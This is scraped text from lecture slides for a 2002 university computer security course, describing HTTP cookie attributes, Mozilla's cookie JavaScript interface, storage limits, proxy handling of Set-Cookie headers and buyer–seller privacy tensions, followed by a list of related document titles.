path=PATH The path attribute is used to specify the subset of URLs in a

domain for which the cookie is valid.

secure If a cookie is marked secure, it will only be transmitted if the

communications channel with the host is a secure one. Currently this means that secure cookies will only be sent to HTTPS (HTTP over SSL) servers. If secure is not specified, a cookie is considered safe to be sent in the clear over unsecured channels.


Browser Volunteers Cookie to Server!

• If Browser visits the URL again, it volunteers cookie name and contents to the URL

•Cookie: NAME1=OPAQUE_STRING1; NAME2=OPAQUE_STRING2 ...

•Server Database can contain– Cookie Name– Opaque String– Who (what IP/Host/User/etc) reported it– When


Cookie Source Codewww.mozilla.org

host \t isDomain \t path \t xxx \t expires \t name \t cookie from http://lxr.mozilla.org/seamonkey/source/extensions/cookie/nsCookie.cpp#2078

JavaScript Interface! Red - read only Name Type Description path string path the cookie applies to domain string domain the cookie applies to name string name of the cookie value string value of the cookie expires string date the cookie expires url string url setting the cookie TROJAN HORSE OPPORTUNITY! isSecure boolean the cookie is sent over secure connections only isDomain boolean the cookie has a domain attribute

prompt boolean user has configured prefs to throw cookie confirm dialog preference int the user's cookie acceptance value

accept() method allows the cookie to be set reject() method causes the cookie not to be set ask() method prompt a netlib confirmation dialog (happens during netlib set cookie execution) confirm() method prompt a javascript confirmation dialog (happens during javascript function execution)


Cookies - Notes• Multiple Set-Cookie headers in single server response. • Same path but different names will add additional mappings. • Higher-level path value not override specific path mappings. • Expires header lets client purge the mapping but not required. • Number of cookies that a client can store at any one time.

– 300 total cookies – 4 kilobytes per cookie– 20 cookies per server domain.

• CGI script deletes a cookie by returning same cookie expired time.– This requirement makes it difficult for anyone but the originator of a cookie to

delete a cookie.

• Set-cookie response header should never be cached. • If proxy server receives response containing Set-cookie, it should

propagate the Set-cookie header to the client, regardless of whether the response was 304 (Not Modified) or 200 (OK).

• Similarly, if a client request contains a Cookie: header, it should be forwarded through a proxy, even if the conditional If-modified-since request is being made.


Two Sides

• Buyer wants things without exposing any information he discloses to any use other than what they MUST have to give him the things he wants. (Cryptophilia)

• Seller wants to know as much about Buyer as possible because this gives him control over Buyers and therefore revenue. He can also sell this information (e.g., to advertisers). He wants unrestricted use of this information.

• BUT, Buyers now collect information on Sellers and misuse that (The Sky is Falling.)

• An Agreement is bilateral. The Internet can make possible agreements public and thereby expose both Sellers and Buyers to violations.

Lecture 5, 20-771: Computer Security, Fall 2002 1 20-771: Computer Security Lecture 4: ATTACK WEEK Robert Thibadeau School of Computer Science Carnegie.

Documents

computer security lecture

major computer security

todays lecture

linux slide

public key certificates

509v3 certificates

optional object identifier

legal object identifier